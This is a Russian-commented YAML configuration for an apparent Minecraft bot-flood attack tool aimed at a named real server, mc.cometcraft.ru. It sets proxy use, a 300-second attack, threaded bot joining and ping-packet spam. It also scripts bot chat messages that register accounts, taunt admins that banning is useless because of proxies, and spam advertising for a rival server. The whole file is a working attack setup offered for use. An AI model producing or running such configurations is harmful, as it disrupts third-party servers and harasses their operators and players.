host: mc.cometcraft.ru # IP-адрес сервера
port: 25565 # Порт сервера
proxy: HTTP # Тип используемых прокси | SOCKS, HTTP, BOTH, NONE
duration: 300 # Длительность атаки | секунды
threads: 10 # Количество потоков для отправки ботов | Потоки запускаются со скоростью: 20/сек
delay: 10 # Задержка отправки ботов для каждого потока | миллисекунды
nicks: LIST # Тип ников | LIST, ALTS или RANDOM
listen: true # Отслеживать состояние бота и иметь возможность осуществлять действия
ping: true # Активировать модуль спама пинг-пакетами
join: true # Активировать модуль спама ботами
chat: true # Выводить чат сервера
info: 0 # Способ вывода информации | 0 или 1
stay: true # Удерживать ботов на сервере
actions: # Выполнять определённые действия на сервере | количество_выполнений;задержка;действие;аргументы
  - 1;100;chat;/reg 12311WwW 12311WwW
  - 2;1000;chat;!Боты стоят на прокси серверах, их нету смысла даже банить.
  - 3;2000;chat;!PLAY.LTMC.FUN БЕСПЛАТНЫЙ ДОНАТ > /FREE ЧИТЫ! ВСЕМ (ЗВЕЗДА+OP) ВЫЖИВАНИЕ+АНАРХИЯ! МиниИгры!
  - 4;3000;chat;!PLAY.LTMC.FUN БЕСПЛАТНЫЙ ДОНАТ > /FREE ЧИТЫ! ВСЕМ (ЗВЕЗДА+OP) ВЫЖИВАНИЕ+АНАРХИЯ! МиниИгры!
  - 5;4000;chat;!PLAY.LTMC.FUN БЕСПЛАТНЫЙ ДОНАТ > /FREE ЧИТЫ! ВСЕМ (ЗВЕЗДА+OP) ВЫЖИВАНИЕ+АНАРХИЯ! МиниИгры!